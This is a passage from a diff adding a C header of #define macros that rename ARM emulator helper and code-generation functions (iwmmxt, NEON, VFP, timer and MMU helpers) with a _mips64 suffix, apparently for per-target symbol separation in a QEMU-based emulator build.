gen_op_iwmmxt_subnl_M0_wRn_mips64 +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_mips64 +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_mips64 +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_mips64 +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_mips64 +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_mips64 +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_mips64 +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_mips64 +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_mips64 +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_mips64 +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_mips64 +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_mips64 +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_mips64 +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_mips64 +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_mips64 +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_mips64 +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_mips64 +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_mips64 +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_mips64 +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_mips64 +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_mips64 +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_mips64 +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_mips64 +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_mips64 +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_mips64 +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_mips64 +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_mips64 +#define gen_rev16 gen_rev16_mips64 +#define gen_revsh gen_revsh_mips64 +#define gen_rfe gen_rfe_mips64 +#define gen_sar gen_sar_mips64 +#define gen_sbc_CC gen_sbc_CC_mips64 +#define gen_sbfx gen_sbfx_mips64 +#define gen_set_CF_bit31 gen_set_CF_bit31_mips64 +#define gen_set_condexec gen_set_condexec_mips64 +#define gen_set_cpsr gen_set_cpsr_mips64 +#define gen_set_label gen_set_label_mips64 +#define gen_set_pc_im gen_set_pc_im_mips64 +#define gen_set_psr gen_set_psr_mips64 +#define gen_set_psr_im gen_set_psr_im_mips64 +#define gen_shl gen_shl_mips64 +#define gen_shr gen_shr_mips64 +#define gen_smc gen_smc_mips64 +#define gen_smul_dual gen_smul_dual_mips64 +#define gen_srs gen_srs_mips64 +#define gen_ss_advance gen_ss_advance_mips64 +#define gen_step_complete_exception gen_step_complete_exception_mips64 +#define gen_store_exclusive gen_store_exclusive_mips64 +#define gen_storeq_reg gen_storeq_reg_mips64 +#define gen_sub_carry gen_sub_carry_mips64 +#define gen_sub_CC gen_sub_CC_mips64 +#define gen_subq_msw gen_subq_msw_mips64 +#define gen_swap_half gen_swap_half_mips64 +#define gen_thumb2_data_op gen_thumb2_data_op_mips64 +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_mips64 +#define gen_ubfx gen_ubfx_mips64 +#define gen_vfp_abs gen_vfp_abs_mips64 +#define gen_vfp_add gen_vfp_add_mips64 +#define gen_vfp_cmp gen_vfp_cmp_mips64 +#define gen_vfp_cmpe gen_vfp_cmpe_mips64 +#define gen_vfp_div gen_vfp_div_mips64 +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_mips64 +#define gen_vfp_F1_mul gen_vfp_F1_mul_mips64 +#define gen_vfp_F1_neg gen_vfp_F1_neg_mips64 +#define gen_vfp_ld gen_vfp_ld_mips64 +#define gen_vfp_mrs gen_vfp_mrs_mips64 +#define gen_vfp_msr gen_vfp_msr_mips64 +#define gen_vfp_mul gen_vfp_mul_mips64 +#define gen_vfp_neg gen_vfp_neg_mips64 +#define gen_vfp_shto gen_vfp_shto_mips64 +#define gen_vfp_sito gen_vfp_sito_mips64 +#define gen_vfp_slto gen_vfp_slto_mips64 +#define gen_vfp_sqrt gen_vfp_sqrt_mips64 +#define gen_vfp_st gen_vfp_st_mips64 +#define gen_vfp_sub gen_vfp_sub_mips64 +#define gen_vfp_tosh gen_vfp_tosh_mips64 +#define gen_vfp_tosi gen_vfp_tosi_mips64 +#define gen_vfp_tosiz gen_vfp_tosiz_mips64 +#define gen_vfp_tosl gen_vfp_tosl_mips64 +#define gen_vfp_touh gen_vfp_touh_mips64 +#define gen_vfp_toui gen_vfp_toui_mips64 +#define gen_vfp_touiz gen_vfp_touiz_mips64 +#define gen_vfp_toul gen_vfp_toul_mips64 +#define gen_vfp_uhto gen_vfp_uhto_mips64 +#define gen_vfp_uito gen_vfp_uito_mips64 +#define gen_vfp_ulto gen_vfp_ulto_mips64 +#define get_arm_cp_reginfo get_arm_cp_reginfo_mips64 +#define get_clock get_clock_mips64 +#define get_clock_realtime get_clock_realtime_mips64 +#define get_constraint_priority get_constraint_priority_mips64 +#define get_float_exception_flags get_float_exception_flags_mips64 +#define get_float_rounding_mode get_float_rounding_mode_mips64 +#define get_fpstatus_ptr get_fpstatus_ptr_mips64 +#define get_level1_table_address get_level1_table_address_mips64 +#define get_mem_index get_mem_index_mips64 +#define get_next_param_value get_next_param_value_mips64 +#define get_opt_name get_opt_name_mips64 +#define get_opt_value get_opt_value_mips64 +#define get_page_addr_code get_page_addr_code_mips64 +#define get_param_value get_param_value_mips64 +#define get_phys_addr get_phys_addr_mips64 +#define get_phys_addr_lpae get_phys_addr_lpae_mips64 +#define get_phys_addr_mpu get_phys_addr_mpu_mips64 +#define get_phys_addr_v5 get_phys_addr_v5_mips64 +#define get_phys_addr_v6 get_phys_addr_v6_mips64 +#define get_system_memory get_system_memory_mips64 +#define get_ticks_per_sec get_ticks_per_sec_mips64 +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_mips64 +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__mips64 +#define gt_cntfrq_access gt_cntfrq_access_mips64 +#define gt_cnt_read gt_cnt_read_mips64 +#define gt_cnt_reset gt_cnt_reset_mips64 +#define gt_counter_access gt_counter_access_mips64 +#define gt_ctl_write gt_ctl_write_mips64 +#define gt_cval_write gt_cval_write_mips64 +#define gt_get_countervalue gt_get_countervalue_mips64 +#define gt_pct_access gt_pct_access_mips64 +#define gt_ptimer_access gt_ptimer_access_mips64 +#define gt_recalc_timer gt_recalc_timer_mips64 +#define gt_timer_access gt_timer_access_mips64 +#define gt_tval_read gt_tval_read_mips64 +#define gt_tval_write gt_tval_write_mips64 +#define gt_vct_access gt_vct_access_mips64 +#define gt_vtimer_access gt_vtimer_access_mips64 +#define guest_phys_blocks_free guest_phys_blocks_free_mips64 +#define guest_phys_blocks_init guest_phys_blocks_init_mips64 +#define handle_vcvt handle_vcvt_mips64 +#define handle_vminmaxnm handle_vminmaxnm_mips64 +#define handle_vrint handle_vrint_mips64 +#define handle_vsel handle_vsel_mips64 +#define has_help_option has_help_option_mips64 +#define have_bmi1 have_bmi1_mips64 +#define have_bmi2 have_bmi2_mips64 +#define hcr_write hcr_write_mips64 +#define helper_access_check_cp_reg helper_access_check_cp_reg_mips64 +#define helper_add_saturate helper_add_saturate_mips64 +#define helper_add_setq helper_add_setq_mips64 +#define helper_add_usaturate helper_add_usaturate_mips64 +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_mips64 +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_mips64 +#define helper_be_ldq_mmu helper_be_ldq_mmu_mips64 +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_mips64 +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_mips64 +#define helper_be_ldul_mmu helper_be_ldul_mmu_mips64 +#define helper_be_lduw_mmu helper_be_lduw_mmu_mips64 +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_mips64 +#define helper_be_stl_mmu helper_be_stl_mmu_mips64 +#define helper_be_stq_mmu helper_be_stq_mmu_mips64 +#define helper_be_stw_mmu helper_be_stw_mmu_mips64 +#define helper_clear_pstate_ss helper_clear_pstate_ss_mips64 +#define helper_clz_arm helper_clz_arm_mips64 +#define helper_cpsr_read helper_cpsr_read_mips64 +#define helper_cpsr_write helper_cpsr_write_mips64 +#define helper_crc32_arm helper_crc32_arm_mips64 +#define helper_crc32c helper_crc32c_mips64 +#define helper_crypto_aese helper_crypto_aese_mips64 +#define helper_crypto_aesmc helper_crypto_aesmc_mips64 +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_mips64 +#define helper_crypto_sha1h helper_crypto_sha1h_mips64 +#define helper_crypto_sha1su1 helper_crypto_sha1su1_mips64 +#define helper_crypto_sha256h helper_crypto_sha256h_mips64 +#define helper_crypto_sha256h2 helper_crypto_sha256h2_mips64 +#define helper_crypto_sha256su0 helper_crypto_sha256su0_mips64 +#define helper_crypto_sha256su1 helper_crypto_sha256su1_mips64 +#define helper_dc_zva helper_dc_zva_mips64 +#define helper_double_saturate helper_double_saturate_mips64 +#define helper_exception_internal helper_exception_internal_mips64 +#define helper_exception_return helper_exception_return_mips64 +#define helper_exception_with_syndrome helper_exception_with_syndrome_mips64 +#define helper_get_cp_reg helper_get_cp_reg_mips64 +#define helper_get_cp_reg64 helper_get_cp_reg64_mips64 +#define helper_get_r13_banked helper_get_r13_banked_mips64 +#define helper_get_user_reg helper_get_user_reg_mips64 +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_mips64 +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_mips64 +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_mips64 +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_mips64 +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_mips64 +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_mips64 +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_mips64 +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_mips64 +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_mips64 +#define helper_iwmmxt_addub helper_iwmmxt_addub_mips64 +#define helper_iwmmxt_addul helper_iwmmxt_addul_mips64 +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_mips64 +#define helper_iwmmxt_align helper_iwmmxt_align_mips64 +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_mips64 +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_mips64 +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_mips64 +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_mips64 +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_mips64 +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_mips64 +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_mips64 +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_mips64 +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_mips64 +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_mips64 +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_mips64 +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_mips64 +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_mips64 +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_mips64 +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_mips64 +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_mips64 +#define helper_iwmmxt_insr helper_iwmmxt_insr_mips64 +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_mips64 +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_mips64 +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_mips64 +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_mips64 +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_mips64 +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_mips64 +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_mips64 +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_mips64 +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_mips64 +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_mips64 +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_mips64 +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_mips64 +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_mips64 +#define helper_iwmmxt_minub helper_iwmmxt_minub_mips64 +#define helper_iwmmxt_minul helper_iwmmxt_minul_mips64 +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_mips64 +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_mips64 +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_mips64 +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_mips64 +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_mips64 +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_mips64 +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_mips64 +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_mips64 +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_mips64 +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_mips64 +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_mips64 +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_mips64 +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_mips64 +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_mips64 +#define helper_iwmmxt_packul helper_iwmmxt_packul_mips64 +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_mips64 +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_mips64 +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_mips64 +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_mips64 +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_mips64 +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_mips64 +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_mips64 +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_mips64 +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_mips64 +#define helper_iwmmxt_slll helper_iwmmxt_slll_mips64 +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_mips64 +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_mips64 +#define helper_iwmmxt_sral helper_iwmmxt_sral_mips64 +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_mips64 +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_mips64 +#define helper_iwmmxt_srll helper_iwmmxt_srll_mips64 +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_mips64 +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_mips64 +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_mips64 +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_mips64 +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_mips64 +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_mips64 +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_mips64 +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_mips64 +#define helper_iwmmxt_subub helper_iwmmxt_subub_mips64 +#define helper_iwmmxt_subul helper_iwmmxt_subul_mips64 +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_mips64 +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_mips64 +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_mips64 +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_mips64 +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_mips64 +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_mips64 +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_mips64 +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_mips64 +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_mips64 +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_mips64 +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_mips64 +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_mips64 +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_mips64 +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_mips64 +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_mips64 +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_mips64 +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_mips64 +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_mips64 +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_mips64 +#define helper_ldb_cmmu helper_ldb_cmmu_mips64 +#define helper_ldb_mmu helper_ldb_mmu_mips64 +#define helper_ldl_cmmu helper_ldl_cmmu_mips64 +#define helper_ldl_mmu helper_ldl_mmu_mips64 +#define helper_ldq_cmmu helper_ldq_cmmu_mips64 +#define helper_ldq_mmu helper_ldq_mmu_mips64 +#define helper_ldw_cmmu helper_ldw_cmmu_mips64 +#define helper_ldw_mmu helper_ldw_mmu_mips64 +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_mips64 +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_mips64 +#define helper_le_ldq_mmu helper_le_ldq_mmu_mips64 +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_mips64 +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_mips64 +#define helper_le_ldul_mmu helper_le_ldul_mmu_mips64 +#define helper_le_lduw_mmu helper_le_lduw_mmu_mips64 +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_mips64 +#define helper_le_stl_mmu helper_le_stl_mmu_mips64 +#define helper_le_stq_mmu helper_le_stq_mmu_mips64 +#define helper_le_stw_mmu helper_le_stw_mmu_mips64 +#define helper_msr_i_pstate helper_msr_i_pstate_mips64 +#define helper_neon_abd_f32 helper_neon_abd_f32_mips64 +#define helper_neon_abdl_s16 helper_neon_abdl_s16_mips64 +#define helper_neon_abdl_s32 helper_neon_abdl_s32_mips64 +#define helper_neon_abdl_s64 helper_neon_abdl_s64_mips64 +#define helper_neon_abdl_u16 helper_neon_abdl_u16_mips64 +#define helper_neon_abdl_u32 helper_neon_abdl_u32_mips64 +#define helper_neon_abdl_u64 helper_neon_abdl_u64_mips64 +#define helper_neon_abd_s16 helper_neon_abd_s16_mips64 +#define helper_neon_abd_s32 helper_neon_abd_s32_mips64 +#define helper_neon_abd_s8 helper_neon_abd_s8_mips64 +#define helper_neon_abd_u16 helper_neon_abd_u16_mips64 +#define helper_neon_abd_u32 helper_neon_abd_u32_mips64 +#define helper_neon_abd_u8 helper_neon_abd_u8_mips64 +#define helper_neon_abs_s16 helper_neon_abs_s16_mips64 +#define helper_neon_abs_s8 helper_neon_abs_s8_mips64 +#define helper_neon_acge_f32 helper_neon_acge_f32_mips64 +#define helper_neon_acge_f64 helper_neon_acge_f64_mips64 +#define helper_neon_acgt_f32 helper_neon_acgt_f32_mips64 +#define helper_neon_acgt_f64 helper_neon_acgt_f64_mips64 +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_mips64 +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_mips64 +#define helper_neon_addl_u16 helper_neon_addl_u16_mips64 +#define helper_neon_addl_u32 helper_neon_addl_u32_mips64 +#define helper_neon_add_u16 helper_neon_add_u16_mips64 +#define helper_neon_add_u8 helper_neon_add_u8_mips64 +#define helper_neon_ceq_f32 helper_neon_ceq_f32_mips64 +#define helper_neon_ceq_u16 helper_neon_ceq_u16_mips64 +#define helper_neon_ceq_u32 helper_neon_ceq_u32_mips64 +#define helper_neon_ceq_u8 helper_neon_ceq_u8_mips64 +#define helper_neon_cge_f32 helper_neon_cge_f32_mips64 +#define helper_neon_cge_s16 helper_neon_cge_s16_mips64 +#define helper_neon_cge_s32 helper_neon_cge_s32_mips64 +#define helper_neon_cge_s8 helper_neon_cge_s8_mips64 +#define helper_neon_cge_u16 helper_neon_cge_u16_mips64 +#define helper_neon_cge_u32 helper_neon_cge_u32_mips64 +#define helper_neon_cge_u8 helper_neon_cge_u8_mips64 +#define helper_neon_cgt_f32 helper_neon_cgt_f32_mips64 +#define helper_neon_cgt_s16 helper_neon_cgt_s16_mips64 +#define helper_neon_cgt_s32 helper_neon_cgt_s32_mips64 +#define helper_neon_cgt_s8 helper_neon_cgt_s8_mips64 +#define helper_neon_cgt_u16 helper_neon_cgt_u16_mips64 +#define helper_neon_cgt_u32 helper_neon_cgt_u32_mips64 +#define helper_neon_cgt_u8 helper_neon_cgt_u8_mips64 +#define helper_neon_cls_s16 helper_neon_cls_s16_mips64 +#define helper_neon_cls_s32 helper_neon_cls_s32_mips64 +#define helper_neon_cls_s8 helper_neon_cls_s8_mips64 +#define helper_neon_clz_u16 helper_neon_clz_u16_mips64 +#define helper_neon_clz_u8 helper_neon_clz_u8_mips64 +#define helper_neon_cnt_u8 helper_neon_cnt_u8_mips64 +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_mips64 +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_mips64 +#define helper_neon_hadd_s16 helper_neon_hadd_s16_mips64 +#define helper_neon_hadd_s32 helper_neon_hadd_s32_mips64 +#define helper_neon_hadd_s8 helper_neon_hadd_s8_mips64 +#define helper_neon_hadd_u16 helper_neon_hadd_u16_mips64 +#define helper_neon_hadd_u32 helper_neon_hadd_u32_mips64 +#define helper_neon_hadd_u8 helper_neon_hadd_u8_mips64 +#define helper_neon_hsub_s16 helper_neon_hsub_s16_mips64 +#define helper_neon_hsub_s32 helper_neon_hsub_s32_mips64 +#define helper_neon_hsub_s8 helper_neon_hsub_s8_mips64 +#define helper_neon_hsub_u16 helper_neon_hsub_u16_mips64 +#define helper_neon_hsub_u32 helper_neon_hsub_u32_mips64 +#define helper_neon_hsub_u8 helper_neon_hsub_u8_mips64 +#define helper_neon_max_s16 helper_neon_max_s16_mips64 +#define helper_neon_max_s32 helper_neon_max_s32_mips64 +#define helper_neon_max_s8 helper_neon_max_s8_mips64 +#define helper_neon_max_u16 helper_neon_max_u16_mips64 +#define helper_neon_max_u32 helper_neon_max_u32_mips64 +#define helper_neon_max_u8 helper_neon_max_u8_mips64 +#define helper_neon_min_s16 helper_neon_min_s16_mips64 +#define helper_neon_min_s32 helper_neon_min_s32_mips64 +#define helper_neon_min_s8 helper_neon_min_s8_mips64 +#define helper_neon_min_u16 helper_neon_min_u16_mips64 +#define helper_neon_min_u32 helper_neon_min_u32_mips64 +#define helper_neon_min_u8 helper_neon_min_u8_mips64 +#define helper_neon_mull_p8 helper_neon_mull_p8_mips64 +#define helper_neon_mull_s16 helper_neon_mull_s16_mips64 +#define helper_neon_mull_s8 helper_neon_mull_s8_mips64 +#define helper_neon_mull_u16 helper_neon_mull_u16_mips64 +#define helper_neon_mull_u8 helper_neon_mull_u8_mips64 +#define helper_neon_mul_p8 helper_neon_mul_p8_mips64 +#define helper_neon_mul_u16 helper_neon_mul_u16_mips64 +#define helper_neon_mul_u8 helper_neon_mul_u8_mips64 +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_mips64 +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_mips64 +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_mips64 +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_mips64 +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_mips64 +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_mips64 +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_mips64 +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_mips64 +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_mips64 +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_mips64 +#define helper_neon_narrow_u16 helper_neon_narrow_u16_mips64 +#define helper_neon_narrow_u8 helper_neon_narrow_u8_mips64 +#define helper_neon_negl_u16 helper_neon_negl_u16_mips64 +#define helper_neon_negl_u32 helper_neon_negl_u32_mips64 +#define helper_neon_paddl_u16 helper_neon_paddl_u16_mips64 +#define helper_neon_paddl_u32 helper_neon_paddl_u32_mips64 +#define helper_neon_padd_u16 helper_neon_padd_u16_mips64 +#define helper_neon_padd_u8 helper_neon_padd_u8_mips64 +#define helper_neon_pmax_s16 helper_neon_pmax_s16_mips64 +#define helper_neon_pmax_s8 helper_neon_pmax_s8_mips64 +#define helper_neon_pmax_u16 helper_neon_pmax_u16_mips64 +#define helper_neon_pmax_u8 helper_neon_pmax_u8_mips64 +#define helper_neon_pmin_s16 helper_neon_pmin_s16_mips64 +#define helper_neon_pmin_s8 helper_neon_pmin_s8_mips64 +#define helper_neon_pmin_u16 helper_neon_pmin_u16_mips64 +#define helper_neon_pmin_u8 helper_neon_pmin_u8_mips64 +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_mips64 +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_mips64 +#define helper_neon_qabs_s16 helper_neon_qabs_s16_mips64 +#define helper_neon_qabs_s32 helper_neon_qabs_s32_mips64 +#define helper_neon_qabs_s64 helper_neon_qabs_s64_mips64 +#define helper_neon_qabs_s8 helper_neon_qabs_s8_mips64 +#define helper_neon_qadd_s16 helper_neon_qadd_s16_mips64 +#define helper_neon_qadd_s32 helper_neon_qadd_s32_mips64 +#define helper_neon_qadd_s64 helper_neon_qadd_s64_mips64 +#define helper_neon_qadd_s8 helper_neon_qadd_s8_mips64 +#define helper_neon_qadd_u16 helper_neon_qadd_u16_mips64 +#define helper_neon_qadd_u32 helper_neon_qadd_u32_mips64 +#define helper_neon_qadd_u64 helper_neon_qadd_u64_mips64 +#define helper_neon_qadd_u8 helper_neon_qadd_u8_mips64 +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_mips64 +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_mips64 +#define helper_neon_qneg_s16 helper_neon_qneg_s16_mips64 +#define helper_neon_qneg_s32 helper_neon_qneg_s32_mips64 +#define helper_neon_qneg_s64 helper_neon_qneg_s64_mips64 +#define helper_neon_qneg_s8 helper_neon_qneg_s8_mips64 +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_mips64 +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_mips64 +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_mips64 +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_mips64 +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_mips64 +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_mips64 +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_mips64 +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_mips64 +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_mips64 +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_mips64 +#define helper_neon_qshl_s16 helper_neon_qshl_s16_mips64 +#define helper_neon_qshl_s32 helper_neon_qshl_s32_mips64 +#define helper_neon_qshl_s64 helper_neon_qshl_s64_mips64 +#define helper_neon_qshl_s8 helper_neon_qshl_s8_mips64 +#define helper_neon_qshl_u16 helper_neon_qshl_u16_mips64 +#define helper_neon_qshl_u32 helper_neon_qshl_u32_mips64 +#define helper_neon_qshl_u64 helper_neon_qshl_u64_mips64 +#define helper_neon_qshl_u8 helper_neon_qshl_u8_mips64 +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_mips64 +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_mips64 +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_mips64 +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_mips64 +#define helper_neon_qsub_s16 helper_neon_qsub_s16_mips64 +#define helper_neon_qsub_s32 helper_neon_qsub_s32_mips64 +#define helper_neon_qsub_s64 helper_neon_qsub_s64_mips64 +#define helper_neon_qsub_s8 helper_neon_qsub_s8_mips64 +#define helper_neon_qsub_u16 helper_neon_qsub_u16_mips64 +#define helper_neon_qsub_u32 helper_neon_qsub_u32_mips64 +#define helper_neon_qsub_u64 helper_neon_qsub_u64_mips64 +#define helper_neon_qsub_u8 helper_neon_qsub_u8_mips64 +#define helper_neon_qunzip16 helper_neon_qunzip16_mips64 +#define helper_neon_qunzip32 helper_neon_qunzip32_mips64 +#define helper_neon_qunzip8 helper_neon_qunzip8_mips64 +#define helper_neon_qzip16 helper_neon_qzip16_mips64 +#define helper_neon_qzip32 helper_neon_qzip32_mips64 +#define helper_neon_qzip8 